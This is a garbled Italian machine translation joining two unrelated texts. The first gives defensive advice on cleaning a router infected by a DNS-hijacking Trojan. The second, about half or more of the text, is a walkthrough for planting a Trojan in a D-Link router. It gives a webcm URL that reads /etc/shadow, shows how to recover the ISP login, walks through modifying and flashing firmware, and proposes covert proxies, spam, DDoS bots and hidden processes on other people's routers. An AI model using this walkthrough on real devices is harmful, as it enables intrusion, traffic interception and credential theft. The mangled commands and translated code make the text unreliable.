Per proteggersi dal Trojan.Rbrute Trojan che infetta i modem/router TP-link, è necessario soddisfare alcune semplici condizioni. Il virus si diffonde tramite la scansione a forza bruta degli indirizzi IP nell'intervallo n-esimo, dopodiché inizia a forzare la password utilizzando il metodo brutforce. Quasi tutti i modelli più diffusi di router Tp-link sono suscettibili all'attacco. Entrando nelle impostazioni del dispositivo, il Trojan cambia gli indirizzi DNS del provider con gli indirizzi degli aggressori.
Il tuo router è infetto se:
Quando provi a disconnetterti da qualunque sito, che si tratti del servizio remont-sro.ru o Gmail.com, si apre il sito di download di un falso Google Chrome o di altre risorse sospette. Inizialmente, il reindirizzamento funzionava solo per le richieste degli utenti contenenti le parole Facebook o Google, ma ora il Trojan reagisce a ognuna di esse. L'indicazione sul modem rimane la stessa, "Internet" è acceso fisso, il computer mostra che la connessione è completata, l'autorizzazione è passata, ma Internet in sé non funziona, ma trasferisce solo i download su pagine pubblicitarie e/o false
Punto 1. Reimposta. Riconfigurare il modem
L'istruzione è stata preparata dallo specialista dello ZOO GTU Korchagina Maria
Se non riesci a inserire le impostazioni del modem tramite 192.168.1.1, prova a farlo tramite l'indirizzo 192.168.42.1
In questa pagina vengono specificate le impostazioni solo per il servizio Internet. Per configurare IP-TV e WI-FI scarica i manuali completi
versione russa - http://yadi.sk/d/JC6l6FPVRbU9P
versione inglese - http://yadi.sk/d/j6Ly7bA4RbU8r
1. Per ripristinare correttamente le impostazioni sul modem, premere il pulsante con un ago/pasta/stuzzicadenti Ripristina in una piccola depressione. Teniamo premuto da 5 a 15 secondi fino a quando l'indicazione sul dispositivo scompare. Le luci dovrebbero spegnersi come farebbero dopo un normale riavvio del router.
2. Per la configurazione, il modem deve essere collegato con un cavo a qualsiasi porta LAN, non configurare tramite connessione Wi-Fi.
3. Passare attraverso il browser Internet Explorer all'interfaccia del router, all'indirizzo: 192.168.1.1. Si aprirà una finestra di dialogo. Nei campi "Username" e "Password" inserire rispettivamente admin/admin. Si aprirà la pagina iniziale del router (vedi sotto)
In questa pagina vedrai quali impostazioni esistono già:
4. Prima di iniziare a configurare il router, è necessario eliminare tutte le impostazioni precedentemente create, per questo è necessario andare alla sezione "Impostazioni interfaccia" -> "Internet", selezionare "Canale virtuale" - PVC0, in fondo alla pagina premere il pulsante "cancella". Lo facciamo con ogni canale virtuale (ce ne sono 8).
Di conseguenza, questo è ciò che dovrebbe accadere (vai di nuovo alla sezione "Stato"):
5. Ora vai alla sezione "Configurazione dell'interfaccia", quindi seleziona la sottosezione "Internet"(vedi screenshot sotto). Specifichiamo i parametri come nello screenshot sottostante (utente e password: rtk), quindi salviamo tutti i parametri cliccando il pulsante "Salva".
Questo completa l'impostazione in modalità PPPoE.
Punto 2. Modifica della password per l'accesso al router
Per modificare la password vai alla sezione "Funzionamento del dispositivo", poi "Amministrazione", dove in realtà viene modificata la password per accedere al router (inventa una password complessa) (vedi lo screenshot qui sotto). Quindi premere il pulsante "Salva"
Clausola 2.5 Elenco delle password sconsigliate per l'accesso al router
111111
12345
123456
12345678
abc123
amministratore
Amministratore
parola d'ordine
qwerty
radice
tadpassword
trustno1
consumatore
Drago
gizmodo
iqrquksm
Fammi entrare
Il virus "conosce" già tutte queste password e impiegherà 1 secondo per indovinare la password. La password dovrebbe essere impostata non solo da numeri o lettere. DEVONO essere presenti caratteri speciali (reticoli, asterischi, percentuali, virgolette) e lettere di maiuscole e minuscole (maiuscole e minuscole). Più grande e varia è la password, più tempo ci vorrà per "brutarla" (se possibile).
Punto 3. Limitare l'accesso al modem alla porta WAN.
Alla luce dei crescenti casi di spoofing DNS da parte di programmi dannosi sui dispositivi degli utenti Internet, si pone la questione della sicurezza dei router Wi-Fi. Come controllare un router per i virus? Come rimuovere un virus in un router? La domanda è complessa e semplice allo stesso tempo. C'è una soluzione!
Il virus stesso non può scriversi sulla maggior parte dei router moderni a causa del piccolo spazio nella memoria del router stesso, ma può zombificare il router per partecipare a una botnet. Di norma, questa è una botnet per attaccare vari server o per reindirizzare e analizzare i flussi di informazioni che ti lasciano su Internet.
Le tue password e la tua corrispondenza personale possono cadere nelle mani di intrusi!
Questo deve essere risolto il prima possibile.
- Ripristino delle impostazioni del router
- Firmware del router
- Riconfigurazione
Ripristino delle impostazioni del router
È possibile ripristinare le impostazioni del router premendo il pulsante di ripristino. Di solito questo pulsante si trova sul retro del router, dove si trovano le porte LAN. Solitamente il bottone è incassato nel foro per evitare pressioni accidentali, quindi bisogna usare uno stuzzicadenti. Questo cancellerà le impostazioni del router modificate dal virus e installerà le impostazioni di fabbrica al loro posto. Devo avvertirti che se non sai come configurare il router, allora scarico le sue impostazioni per te non ne vale la pena!
Firmware del router
A volte il virus si "inonda" firmware modificato al router. È possibile rimuovere il firmware del virus dal router eseguendo nuovamente il flashing del router.
Collega il computer al router con un cavo LAN. Un cavo LAN è incluso con qualsiasi router. O tramite Wi-Fi se non c'è una connessione via cavo. Meglio collegarsi con un cavo! La connessione wireless è considerata instabile e non è adatta al firmware del router.
Dopo che ci siamo collegati al router, apriamo il browser (Chrome, Opera, Mozilla, IE) e inserisci l'indirizzo del router ASUS nella barra degli indirizzi, per Asus è 192.168.1.1, nella pagina che si apre ti servirà per inserire login e password per accedere alle impostazioni del router. Accesso: admin, Password: admin. Se il login e la password non sono adatti, chiedi a chi ti ha configurato il router, forse li ha cambiati.
Scarica il firmware dal sito Web del produttore e seleziona il firmware sul disco utilizzando la pagina delle impostazioni del router. Per la stragrande maggioranza dei router, i passaggi del firmware sono gli stessi.
Cari lettori. Per risparmiare tempo. Immediatamente sulla cosa principale. TUTTO quanto segue aiuta in presenza di trojan o virus sul computer per 5-7 giorni. Durante questo periodo, ci sono scansioni da Internet, ma DOPO l'hack, c'è un silenzio sospetto - non ci sono scansioni - non sono più consentite al PC dal router infetto, accetta comandi e li esegue. Ciò influisce sulla velocità di Internet: diminuisce.
Se il tuo router è già infetto, il furto di FTP, posta e altre password è una questione del prossimo futuro.
Già nel 2009. Qualcuno DroneBL ha raccontato al mondo (l'inizio?) di un'epidemia di virus che infettano i router. La sua notizia è arrivata dopo l'attacco al sito, gli amministratori di questo sito hanno rivelato che si tratta di un tipo fondamentalmente nuovo di attacchi Ddos. L'attacco è stato effettuato da router infetti. Quindi ora, la "famiglia" di computer zombi ha acquisito un rifornimento: i router zombi. È stata scoperta una botnet composta da router domestici infetti! Questa rete è stata chiamata "psyb0t". È così che è iniziata ufficialmente l'epidemia di virus del router.
L'hacking avviene scansionando le porte del router e prendendone il controllo. Sfortunatamente, su Internet stanno proliferando articoli su come esattamente questo o quel modello di router sia il più facile da hackerare. Ma è lì che puoi imparare a proteggerti da questa disgrazia. Dopo aver stabilito il controllo sul router, è iniziato lo spionaggio del contenuto del traffico in transito. Rubare password. Partecipazione all'attività dannosa generale della rete botnet in Internet globale. Scansione della porta del PC di casa, ma qui mi soffermerò più in dettaglio. L'autore è stato in grado di rintracciare che la presenza di una connessione di rete al router compromesso porta a tali problemi. Quando reinstalli il firewall, i virus compaiono dal nulla nel sistema. Quando si tenta di installare Debian o Ubuntu durante il download degli aggiornamenti durante l'installazione, questi sistemi sono stati installati in modo errato. Vale a dire
- Il Firestarter installato non può essere avviato: la funzione amministrativa viene avviata e il gioco è fatto. cioè, qualcosa viene avviato con i privilegi di amministratore, ma ciò che è sconosciuto. Firestarter non si avvia.
- Se è presente una connessione Internet, Deadbeef NON si avvia, quando il router viene spento si accende immediatamente.
- Alcune applicazioni che richiedono privilegi di amministratore vengono avviate senza richiedere una password, altre non vengono avviate affatto.
- Da quando è stato scritto questo articolo, questi punti sono diventati meno pronunciati. Cioè, ci saranno problemi, ma sembreranno diversi.
La reinstallazione SULLO STESSO computer, CON LO STESSO disco di installazione, con il router SPENTO, è andata a buon fine. Il sistema (testato per Ubuntu) ha funzionato come un orologio. Questo non è sorprendente, perché i primi ad essere vulnerabili sono stati i router che eseguono il sistema operativo Linux Mipsel. Certo, il danno che deriva da un router zombi è "più vario" di quanto ho notato e descritto qui, ma ciò che siamo ricchi al momento è ciò che condividiamo ...
Windows installato (con il router infetto disabilitato) è sopravvissuto, ma Agnitum Outpost Firewall Pro ha rilevato le scansioni delle porte fin dai primi minuti dopo l'installazione. Quelli. il router sta attaccando la/le porta/e.
Riso. Scansione delle mie porte da Internet e infine da un router infetto.
Come puoi vedere nella figura, il 27/04/2017 alle 23:51:16 è stata eseguita una scansione da un router zombie. Prima di allora, c'erano scansioni da Kaspersky Security Network - 130.117.190.207 (il firewall non le "piace", ma questa è la norma quando è installato Kaspersky) e non è chiaro da dove. E il 27/04/12, il router è stato ripristinato alle impostazioni di fabbrica (Huawei HG530). Da allora, provengono solo da Kaspersky Security Network - 130.117.190.207 e ARP_UNWANTED_REPLY - l'autore ha abilitato il filtro ARP. Pertanto, i tentativi del router di "parlare" ancora una volta con il PC (questa è una normale attività del router - ma ora Agnitum lascia passare solo quelle risposte ARP che arrivano in risposta alla richiesta del mio PC), così come i tentativi di alcuni gli individui che intercettano il traffico utilizzando una risposta ARP falsa vengono bloccati dal firewall. Se qualcuno intercetta il mio traffico in questo modo e lo passa attraverso il suo computer, allora sarò nel ruolo di un impiegato dell'ufficio che utilizza Internet, mentre l'amministratore di sistema di questa impresa vede tutte le mie azioni, redigendo un rapporto dettagliato per il capo . Quante lettere (a chi, su cosa) sono state scritte, quante ho chattato in ICQ. Naturalmente, le password della posta, ecc. può anche rubare.
In conclusione: dal momento in cui ho ripristinato il mio router e ho fatto ciò che descrivo di seguito, non ci sono attacchi da Internet. Il "cannoniere" viene eliminato, il router è pulito e fa SOLO ciò per cui è stato creato. Ma anche il Trojan sul PC deve essere rimosso, altrimenti indirizzerà già gli hacker al tuo IP.
I produttori di hardware di rete non offrono misure di protezione. Le istruzioni per i router contengono una descrizione di come inserire login e password per accedere al provider, ma non si dice che la password di amministratore predefinita nel router non possa essere lasciata! Inoltre, i router hanno necessariamente dei telecomandi che spesso sono inclusi. I produttori di software antivirus tacciono. Involontariamente sorge la domanda, chi ne beneficia.
Vie di infezione.
Meglio vedere una volta. Per quello che propongo animazione GIF, con un'analisi schematica della situazione. Se non è visibile, significa che Adblock o qualcosa di simile sta interferendo: disattivalo in questa pagina.
Ce ne sono due. Il primo è via WAN, è Internet. Quelli. gli hacker trovano il tuo IP, ad esempio, quando scarichi o distribuisci file utilizzando il protocollo torrent (maggiori informazioni su questo alla fine dell'articolo) e scansionando il tuo IP trovano punti deboli nella protezione del router. Ma questo è meno comune. Come chiudere questo cancello, leggiamo più avanti in questo articolo.
Oppure abbiamo un Trojan sul nostro PC. E poi conduce gli hacker al nostro IP dinamico (!). Conoscendo questo indirizzo, stanno già metodicamente "martellando" il router. Stiamo leggendo di Trojan nel secondo percorso di infezione.
Il secondo è via LAN, cioè dal tuo PC. Se il tuo PC ha un cavallo di Troia, gli hacker saranno in grado di forzare la password del router direttamente dal tuo PC. Pertanto, questa password deve essere modificata di tanto in tanto. Ma che dire del fatto che il computer infetto tenterà di hackerare il router dal lato da cui non viene fornita la protezione? Per prima cosa devi capire che un router pulito con un PC infetto non durerà a lungo. Una normale forza bruta (attacco di forza bruta) lo romperà in una settimana, o anche più velocemente. Quindi, se devi pulire spesso il tuo router, è il momento di pensare a una pulizia completa dai virus.
E ora un momento. Da dove viene il virus/trojan sul PC? Vi elenco i principali motivi e, tra parentesi, le soluzioni. Le opzioni sono:
1 - è installato Windows inizialmente crackato (usare dischi di installazione puliti);
2 - un Windows pulito grugnito dopo l'installazione (o sopportalo e reinstallalo mensilmente o acquista Windows);
3 - software crackato (usa programmi gratuiti o acquista quelli a pagamento);
4 - hai un virus nei tuoi file personali (esegui tutti i file personali attraverso la pulizia, come ho descritto in pulizia del sistema dai virus);
5 - il sistema è già infetto durante l'uso tramite un'unità flash USB, Internet, chissà come (protezione - studiamo Internet in modo sicuro, sulle unità flash, non menzionerò l'ultimo punto).
Separatamente, noto che dopo aver scoperto un router IP, gli hacker iniziano a scansionarlo per trovare l'accesso alla password crittografata e quindi prendere il controllo utilizzando la password rubata. Quindi, non lasciare il router acceso se non hai bisogno dell'accesso a Internet ora.
MA!!! Anche se scarichi utilizzando una macchina virtuale, inizieranno a martellare il tuo router. Disabilitarlo e riattivarlo nel processo aiuterà qui, e la cosa PRINCIPALE al termine del download del torrent: il provider rilascerà un nuovo IP dinamico dopo aver riavviato il router e gli hacker dovranno solo indovinare a quale indirizzo ti trovi ora. E anche il tuo router ... Naturalmente, non rimarrai sulle distribuzioni: dopo aver completato il download, dovresti disattivare immediatamente il programma di downloader torrent e DOPO spegnere e accendere il router.
E in generale
NON MANTENERE ACCESO IL ROUTER A MENO CHE! Non lasciare che hacker di piccole dimensioni accedano di nuovo alla tua proprietà... Non dimenticare di pulire il router ogni volta che la velocità di connessione a Internet diminuisce in modo irragionevole. La cautela non guasta...
Tutto bene. Ora puoi prendere le istruzioni di fabbrica per il tuo router e specificare il login e la password rilasciati dal provider Internet. Questo di solito viene fatto nella scheda delle impostazioni WAN. Ora non sarai più in grado di controllare il tuo router tramite Internet. Almeno per ora.
Ciao mio lettore! In questo articolo parlerò di fantastici router ADSL
- pezzi di ferro insostituibili nelle reti domestiche e industriali. Ti parlerò della domanda
sfruttamento di questi pezzi di ferro per scopi a noi vantaggiosi - cucire in modo brutale
Trojan all'interno del router. E in modo tale che né l'uno né l'altro
amministratore intelligente, nessun utente con le orecchie.
IQ desideri o requisiti
Quando ho scritto questo articolo, ho pensato che leggerlo sarebbe stato sufficiente
utente avanzato con installato GNU\Linux, che possiede anche alcune competenze
lavorare e programmare in questo sistema operativo. Tuttavia, sembra
è possibile ripetere le mie azioni su Windows (usando Cygwin, per esempio), ma
non sarà descritto. Per il massimo piacere, hai anche bisogno
abilità nel possedere un saldatore (questo è facoltativo).
E tutto è cominciato...
Qualcosa mi ha distratto. Quindi, tutto è iniziato con come un giorno questo stesso
un pezzo di ferro, o meglio, ha tagliato a tradimento la connessione a Internet e non l'ha fatto
voleva ripristinarlo. Allo stesso tempo, era lontana, con accesso fisico
non c'era nessuno a vederla (tuttavia, qualcosa a cui ho mentito - ero troppo pigro per alzarmi dal divano
riavviare il router :)), l'interfaccia web non ha risposto, ma me lo sono ricordato su
questa cosa deve essere telnet o ssh. Vai all'area amministrazione i
non ho mai provato prima e non ho cambiato incautamente la password per il mio account (come
si è scoperto in seguito, invano, perché di default è "admin: admin"). Così io
provato SSH e ha funzionato!
$ ssh [e-mail protetta]
$Password:
Come un fulmine a ciel sereno! BusyBox! Non ho mai pensato sotto di chi?
questo router è sotto controllo, si scopre - GNU / Linux! mi sentivo inquietante
Mi chiedo come funzioni tutto qui e, mentalmente, grazie alla pigrizia e al caso, io
intrapreso uno studio.
Raccolta di informazioni
Allora da dove ho cominciato? Naturalmente, dall'elenco dei comandi disponibili:
# occupato
...
Funzioni attualmente definite:
[, ash, busybox, cat, chgrp, chmod, chown, cp, date, dd, df, echo, false, free,
grep, hostname, id, ifconfig, init, insmod, kill, ln, login, ls, lsmod, mkdir,
modprobe, mount, mv, passwd, ping, ps, pwd, reboot, rm, rmmod, route, sh, sleep,
sync, tar, test, tftp, touch, true, tty, umount, wget, whoami, sì
Il set è abbastanza sano, abbastanza per la normale ricerca e realizzazione di idee.
Il successivo ha suscitato interesse per la versione del kernel:
# cat / proc / versione
Linux versione 2.4.17_mvl21-malta-mips_fp_le ( [e-mail protetta]) (versione gcc 2.95.3
20010315 (versione / MontaVista)) # 1 Thu Dec 28 05:45:00 CST 2006
Per riferimento: MontaVista è una distribuzione orientata all'embedded
sistemi. La stragrande maggioranza dei produttori di apparecchiature di rete dà
preferenza per questo sistema Può essere trovato anche su altri dispositivi, ad esempio in
e-book o telefoni cellulari.
# cat / etc / versioni
CLIENTE = DLinkRU
MODELLO = DSL-500T
VERSIONE = V3.02B01T01.RU.20061228
HTML_LANG = EN.302
SCHEDA = AR7VW
ID_VERSIONE =
CPUARCH_NAME = AR7
MODEL_ID =
STAMP.FS = 20061228055253
# cat / proc / cpuinfo
processore
: 0
modello di CPU
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
aspetta istruzione: no
timer microsecondi: sì
vettore di interruzione extra: sì
punto di vista hardware: sì
Eccezioni VCED: non disponibile
Eccezioni VCEI: non disponibile
AR7 è un chip dual-core sviluppato da Texas Instruments. Lui
contiene un vero e proprio router ADSL su un chip che supporta gli standard ADSL1,
ADSL2, ADSL2+. Basato su processore MIPS 4KEc RISC ad alte prestazioni, con
frequenza di clock 175 o 233 (a seconda della tecnologia di produzione: 18 micron
o 13 micron). Il chip contiene a bordo 2 interfacce UART di cui una (UART_A)
viene utilizzato per visualizzare le informazioni di debug, nonché un'interfaccia EJTAG che serve
per il debug (lampeggiante) Memoria flash. L'uso di queste interfacce sarà
descritto sotto.
Infine, ho guardato le informazioni sulla memoria:
# cat / proc / monta
/ dev / mtdblock / 0 / squashfs ro 0 0
nessuno / dev devfs rw 0 0
proc / proc proc rw 0 0
ramfs / var ramfs rw 0 0
# cat / proc / mtd
dev: dimensione cancella nome
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"
Naturalmente, senza dimenticare gli indirizzi di blocco:
# cat / proc / ticfg / env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000
Da quanto sopra, ne consegue che la memoria Flash (/dev/mtdblock) ha 5 blocchi:
mtd0- Immagine del file system SquashFs. Questo è un file speciale
un sistema compresso di sola lettura. Per
compressione, viene utilizzato l'algoritmo gzip, ma in questo caso - LZMA (rapporto di compressione
sopra). La dimensione di questo blocco è di 4 MB.
mtd1- questo blocco contiene il kernel MontaVista compresso dall'algoritmo LZMA
condizione, dimensione del blocco 600 KB.
mtd2- Bootloader ADAM2, esegue l'avvio del kernel, ha anche
servizio FTP server per il ripristino e il flashing. Maggiori dettagli su di lui saranno
detto oltre. La dimensione del blocco è di 64 KB.
mtd3- condiviso tra dati di configurazione e ambiente
(variabili d'ambiente), che può essere visualizzato in /proc/ticfg/env.
I dati di configurazione si trovano in /etc/config.xml. Intermediario tra file
sistema, il blocco di configurazione è chiuso (come tutti cm_ *, control, oh
li in seguito) il programma cm_logic. Anche la dimensione di questo blocco è di 64 KB.
mtd4- contiene la firma del firmware, il kernel e l'immagine del file
sistemi. Questo blocco viene utilizzato durante l'aggiornamento del firmware tramite l'interfaccia Web.
Inizialmente, è memorizzato in questo blocco, quindi viene controllato il checksum
e, se converge, si iscrive alla sua nuova posizione.
RAM (16 MB in questo modello, ma ADAM2 in questo modello
vede solo 14 MB, viene trattato con un aggiornamento), montato nella directory / var e la sua
puoi tranquillamente utilizzare per i nostri scopi:
#libero
buffer condivisi gratuiti utilizzati totali
Mem: 14276 10452 3824 0
Non dimentichiamo di andare oltre l'elenco dei processi. Di quelli interessanti in agguato qui
demoni: thttpd - server web; dproxy - server proxy che memorizza nella cache le richieste DNS; ddnsd
- demone DNS; pppd ... - il demone vero e proprio che implementa la connessione tramite il protocollo
PPP, e nei parametri vediamo i dati dell'account. Quindi, se il router non lo fa
finge di essere un tubo (leggi - non in modalità bridge), quindi puoi
facile ottenere un account.
I programmi cm_* sono proprietari e sono già inclusi nei codici sorgente.
compilato (questi programmi sono sviluppati anche da Texas Instruments, su D-Link
non dovresti giurare per il mancato rispetto delle licenze).
cm_logica- un programma che controlla la logica del sistema, attraverso di esso
la configurazione passa; sincronizza /etc/config.xml con
la parte corrispondente del contenuto di /dev/ticfg (che punta a mtd3).
cm_cli- interfaccia a riga di comando per la gestione e la configurazione
sistemi. Ad esempio, le impostazioni di connessione vengono effettuate tramite questa interfaccia.
cm_pc- esegue e monitora i processi, collegamenti alle regole
(ad esempio, esegui il programma come demone, le regole includono anche informazioni su
porte da aprire) descritte in /etc/progdefs.xml; caricato subito dopo
kernel.
webcm- Interfaccia CGI, piena di buchi, ad esempio ti permette di guardare / etc / shadow,
semplicemente facendo riferimento all'URL.
http://192.168.1.1/../../../etc/shadow
Non ho ottenuto nulla, thttpd non è così semplice, ma se è così:
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow
Un'altra cosa. Questo può essere usato per raccogliere informazioni se non c'è accesso a
ssh / telnet, ma c'è l'accesso all'interfaccia web.
firmwarecfg- utilizzato per il firmware tramite l'interfaccia Web. All'entrata
di questo programma, un'immagine viene inviata dall'interfaccia Web tramite una richiesta POST, ed è già
reindirizza alla memoria Flash, dopo aver verificato il checksum dell'immagine.
Questo completa la raccolta delle informazioni primarie, è ora di passare a quelle decisive
Azioni.
Installazione degli strumenti di sviluppo e compilazione del firmware
Firmware per router D-Link (e tutti gli altri basati su GNU/Linux)
distribuiti sotto licenza GPL, puoi ottenerli presso l'ufficiale
server FTP. In effetti, puoi sceglierne uno dall'elenco dei firmware suggeriti,
sono gli stessi (per quanto riguarda la serie T). La consegna contiene il codice sorgente del kernel, ambiente,
strumenti e toolchain necessari per sviluppare / compilare esistenti
programmi. Dovrebbe essere decompresso alla radice e aggiunto alla variabile d'ambiente
PATH percorso alla directory bin della toolchain:
$ tar xvf tools.tgz
$ PERCORSO esportazione = $ PERCORSO: / opt /
Ora, per compilare il tuo firmware, vai alla directory
con i codici sorgente ed eseguire questo make.
$ cd DSL / TYLinuxV3 / src && make
Verranno poste molte domande sull'abilitazione del supporto del dispositivo (meglio
rispondere positivamente). Alla fine della compilazione nella directory TYLinuxV3 / images
verranno create le immagini del firmware. Puoi anche eseguire lo script con lo stesso nome con il tuo
model dalla directory /TYLinuxV3/src/scripts.
Qualche parola sul trasferimento di file tra un router e un computer. Il primissimo
il metodo che ho applicato è la possibilità di trasferire file utilizzando il protocollo SSH,
utilizzando il programma scp. Ma poco dopo ho scoperto che mc (mezzanotte
Commander) ha anche la possibilità di connettersi tramite SSH (Pannello -> Connessione Shell).
In alternativa, puoi configurare un server Web o FTP sul posto di lavoro. Più tardi, io
ha dato la preferenza al server Web, perché funziona il più veloce. ho installato
thttpd, piccolo e veloce, proprio come su un router. Lo accendiamo e lo tiriamo su
router, dopo essere andato nella directory /var (it, come accennato
precedentemente disponibile per la registrazione).
$ thttpd -g -d ~ / ForRouter -u utente -p 8080
# cd / var
# wget http://192.168.1.2/file
Per estrarre il file dal router, puoi anche aprire il server Web:
# thttpd -g -d / var -u root -p 8080
Fai attenzione, se vuoi scaricare il file eseguibile dal router, dovresti
rimuovere i diritti di avvio. Quando si scarica un numero elevato di file da un router
è meglio usare mc, non sarà necessario copiare prima i file in / var e
rimuovere i diritti, quindi eliminare questi file per liberare spazio. In generale, il caso
gusto, scegli l'opzione che fa per te.
Creare il tuo programma
Cominciamo, ovviamente, con il classico della programmazione HelloWorld. Alcuni speciali
Non ci sono regole. Il testo del programma è dolorosamente familiare:
#includere
#includere
int principale (vuoto)
{
printf ("Mate.Feed.Kill.Repeat.");
restituisce 0;
}
Compila (il percorso della toolchain deve essere specificato nella variabile d'ambiente
SENTIERO):
$ mips_fp_le-gcc hell.c -o hell
$ mips_fp_le-strip -s inferno
# cd / var
# chmod + x inferno
# ./inferno
E ... non accadrà nulla o verrà eliminata una notifica di percorso non trovato. Cosa è
Astuccio? Ho già parlato di cm_pc - questo programma ne lancia altri in
secondo le regole descritte in /etc/progdefs.xml. Ora è arrivato il momento
modificare e flashare le immagini del filesystem.
Modifica del file system
Per modificare il file system, devi prima
disimballare. Come ho detto, il filesystem qui è SquashFs con la patch LZMA.
Il pacchetto per lo sviluppo del firmware include solo il programma mksquashfs (per creare
image), manca unsquashfs (per scompattare). Ma non importa, è tutto disponibile
sul sito del file system, abbiamo bisogno della prima versione. Applicando un cerotto LZMA e
raccolte le utenze, le mettiamo da parte in un luogo comodo. Per prima cosa, otteniamo l'immagine
file system dal router:
# cat / dev / mtdblock / 0> /var/fs.img
$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs
Ora puoi modificarlo come preferisci o possiamo lanciare FuckTheWorld in
directory /bin e aggiungi una regola da eseguire in /etc/progdefs.xml.
$ cp ciao unpacked_fs / bin
$ vim unpacked_fs / etc / progdefs.xml
E aggiungi questo (tra i tag
Salviamo e rimbocchiamo:
$ mksquashfs unpacked_fs my_fs.img -noappend
Si prega di notare che l'immagine del file system non deve superare
dimensioni consentite. Se hai voglia di provare qualcosa con urgenza e non lo fa
adatta, rimuovi dall'immagine qualcosa di "non necessario" come grep, whoami o
utilizzare il packer eseguibile UPX. Ora carica sul router
immagine e passare alla sezione successiva.
Acquisizione di immagini del file system
Il metodo per flashare il router è molto semplice, consiste nell'accedere al dispositivo
/dev/mtdblock/*. Quindi, carichiamo sul router in qualsiasi modo conveniente l'immagine del file
sistemi ed eseguire questa semplice azione:
# cat my_fs.img> / dev / mtdblock / 0 && reboot
# cp my_fs.img / dev / mtdblock / 0 && reboot
Dopo un po', al termine del processo di registrazione, il router si riavvierà e
le modifiche avranno effetto. Provando a eseguire il nostro esempio:
# inferno
Mate.Feed.Kill.Ripeti.
Metodi di ripristino in caso di guasto
Prima di eseguire il flashing del router con "mestieri" più seri, dovresti scoprire come
come agire in casi critici quando il router si rifiuta
caricare. Non ci sono situazioni senza speranza. Il server FTP ADAM2 viene in soccorso. Per
prima è necessario eseguire il client FTP all'indirizzo IP di ADAM2, che può essere spiato
in /proc/ticfg/env (parametro my_ipaddress).
$ ftp 192.168.1.199
220 ADAM2 Server FTP pronto.
530 Effettua il login con USER e PASS.
Per chiarezza, puoi abilitare la modalità di debug, quindi tutto
info e tutte le risposte FTP:
Accesso / password - adam2 / adam2. Il processo di lampeggio è molto semplice. Iniziare
trasferire la sessione FTP in modalità binaria:
ftp> quote MEDIA FLSH
Ora inviamo, ad esempio, un'immagine del file system e indichiamo la posizione
destinazione:
ftp> metti fs.img "fs.img mtd0"
Stiamo aspettando la fine della registrazione, riavviare il router, uscire dalla sessione:
ftp> quote REBOOT
ftp> esci
Qualunque cosa! Come puoi vedere, non c'è niente di difficile, ora se qualcosa va storto, tu
puoi sempre sistemare la situazione.
Per comodità di lavoro, dovresti fornire un normale indirizzo IP, abilita
caricamento automatico (per non ballare con il reset) e aumentare leggermente il tempo
in attesa di una connessione prima di caricare il kernel. Tutti questi parametri sono memorizzati in
variabili d'ambiente, ci sono speciali comandi FTP ADAM2: GETENV e SETENV (per
rispettivamente ottenere e impostare una variabile). Nella sessione FTP, inserisci quanto segue
comandi:
ftp> SETENV caricamento automatico, 1
ftp> SETENV autoload_timeout, 8
ftp> SETENV mio_indirizzoip, 192.168.1.1
ftp> quote REBOOT
ftp> esci
Il router si riavvia e puoi accedere ad ADAM2 a 192.168.1.1:21. Se
ci sarà il desiderio di eseguire il reflash dell'immagine del kernel e il kernel rifiuterà di avviarsi, FTP
inizierà da solo. Prima di lampeggiare le immagini modificate, assicurarsi di
salvare corrente per il ripristino. In generale, puoi modificare le variabili d'ambiente
e tramite /proc/ticfg/env, volevo solo dirti di più sul lavoro con FTP.
# echo my_ipaddress 192.168.1.1> proc / ticfg / env
E puoi controllare le modifiche in questo modo:
# cat / proc / ticfg / env | grep mio_indirizzoip
Cosa fare se si desidera provare a eseguire il reflash del bootloader e come?
agire in caso di fallimento? O il router non si avvia per qualche motivo e
nessun accesso ad ADAM2? C'è una via d'uscita: JTAG, o meglio, questo chip contiene EJTAG
(versione estesa). È un'interfaccia per il debug/programmazione in-circuit.
Per connetterci a questa interfaccia, abbiamo bisogno della porta LPT del computer,
connettori e 4 resistenze. Lo schema è molto semplice.
Mi affretto a notare che il firmware tramite JTAG non è veloce, ci vorrà abbastanza
molto tempo. Quindi vale la pena usarlo solo per ripristinare il bootloader,
anche se non funziona. Per comunicare tramite JTAG, è necessario utilizzare uno speciale
un programma come UrJTAG. Di seguito è riportato un esempio di come funziona questa interfaccia.
Stabilire una connessione:
jtag> cavo parallelo 0x378 DLC5
jtag> rileva
Rilevamento della memoria flash:
jtag> rileva flash 0x30000000 1
Lettura della memoria flash:
jtag> readmem 0x30000000 0x400000 fullflash.img
Scrittura in memoria (bootloader):
jtag> flashmem 0x30000000 adam2.img
È anche utile conoscere l'interfaccia UART (ho promesso di parlarne prima). V
UART_A riporta, ovvero registra il bootloader (in una fase iniziale del caricamento da
puoi parlare con lui) e il nucleo. Quando si scrivono kernel modificati è
indispensabile per il debug. UART - Ricevitore/trasmettitore asincrono universale
(ricetrasmettitore asincrono universale) è quasi sempre presente acceso
microcontrollori.
Il circuito dell'adattatore è molto semplice. Basato su un solo microcircuito -
Convertitore di livello TTL: MAX232 per COM e FT232R per USB. Microcircuiti
sono abbastanza comuni e non ci saranno problemi con l'acquisto.
Il circuito è montato su una breadboard (che può essere facilmente riposta nella custodia)
connettore della porta COM) in 20 minuti e porta molti vantaggi. Ad esempio, durante il debug
i kernel sono una soluzione assolutamente insostituibile. E se l'elettronica è stretta? Uscita
sono cavi USB per vecchi telefoni, hanno solo un convertitore
UART - USB.
Alcune idee di distribuzione
Il tuo proxy / sox sul router di qualcun altro è fantastico. Come, infatti, e spam
su tutti i protocolli router. Questo non è un computer Windows per te, il che
riorganizzato ogni mese :). I router spesso non cambiano o non si aggiornano. sì e
Chi oltre a noi avrà in testa l'idea di un'infezione del router?
Non dimenticare che abbiamo tutto il traffico dell'utente/della rete sotto il nostro controllo. Per più
router potenti, è già possibile appendere un bot DDOS. Nascondi file / nascondi processo,
intercettare la scrittura su blocchi mtd, eliminando la cancellazione del nostro programma - tutto ciò che
Qualunque cosa!
Diciamo che stai per iniziare a scrivere un programma serio per un router.
Un ottimo debug è importante, probabilmente dovrai farlo un sacco di volte
